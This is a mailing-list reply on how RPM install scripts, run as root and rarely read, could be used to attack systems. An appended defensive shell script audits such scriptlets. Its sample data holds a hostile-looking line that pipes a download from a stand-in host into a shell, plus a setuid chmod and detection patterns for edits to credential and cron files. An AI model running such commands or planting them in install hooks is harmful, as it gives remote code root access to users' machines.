Re: Viruses



jasta <jasta@gotlinux.org> writes:

> You are stupid.  There can't exactly be too damn many "viruses"
> (most are called exploits anyway because UNIX people don't wanna
> destroy files they wanna own them) because nobody is stupid enough
> to run anything as root.

If anyone is stupid, it's you.  But maybe you just didn't read the
post very well.  Here's the gist.

* Package installations nearly always have to be done as root.

* RPMs (and I think other packaging systems) can run scripts during
  the installation.

* People rarely (if ever) look at the pre and post-install scripts of
  RPMs.

* Malicious people could use those scripts to infect or attack a
  system, since they're done automatically and usually as root.

This is a very good point, and you really should have read it before
giving a knee-jerk response.

Lauris, I am not sure either of your ideas would really help.  Signed
packages won't do much good (since anyone could sign one).  It might
make people a little bit more picky about who their packages came
from, but then again, they might just see "this rpm is signed by
random key, so it should be safe" and not worry about it.

-- 
Alan Shutko <ats@acm.org> - Looking for a job in Long Island!
Check http://rescomp.wustl.edu/~ats/ for a resume.
I'll pretend to trust you if you'll pretend to trust me.
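
The install scripts discussed in the message above can be read before a package is installed. As an added example (not part of the original post), this shell function groups `rpm -qp --scripts` output by phase and flags a few lines worth a closer look; the sample output and the flag patterns are constructed assumptions.

```shell
#!/bin/sh
# Added example: review what an RPM would run as root before installing it.
# Real use:  rpm -qp --scripts ./some-package.rpm | audit_scriptlets
# The flag patterns below are illustrative assumptions, not a complete list.

# Constructed sample of `rpm -qp --scripts` output (not from a real package).
sample_scripts() {
    cat <<'EOF'
preinstall scriptlet (using /bin/sh):
getent group demo >/dev/null || groupadd -r demo
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -s http://example.invalid/setup.sh | sh
chmod 4755 /usr/bin/demo-helper
postuninstall program: /sbin/ldconfig
EOF
}

# Reads scriptlet text on stdin, prints one PHASE line per scriptlet
# and one FLAG line per command that matches a pattern.
audit_scriptlets() {
    awk '
    # Header lines look like "<phase> scriptlet (using <interp>):"
    # or "<phase> program: <path>".
    /^(pre|post)(un)?install (scriptlet|program)/ ||
    /^(pretrans|posttrans|verify) (scriptlet|program)/ {
        phase = $1; print "PHASE " phase; next
    }
    phase == "" { next }   # ignore anything before the first header
    /(curl|wget).*\|[ \t]*(ba)?sh/ {
        print "FLAG " phase " download-piped-to-shell: " $0
    }
    /chmod[ \t]+([2467][0-7][0-7][0-7]|[ugoa]*[+]s)/ {
        print "FLAG " phase " setuid-or-setgid-chmod: " $0
    }
    /\/etc\/(passwd|shadow|sudoers|cron)|authorized_keys/ {
        print "FLAG " phase " touches-auth-or-cron-files: " $0
    }
    '
}

# Run against the constructed sample so the script works offline.
sample_scripts | audit_scriptlets
```

An empty FLAG list only means none of these patterns matched; the PHASE lines still show which scriptlets exist and need reading.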


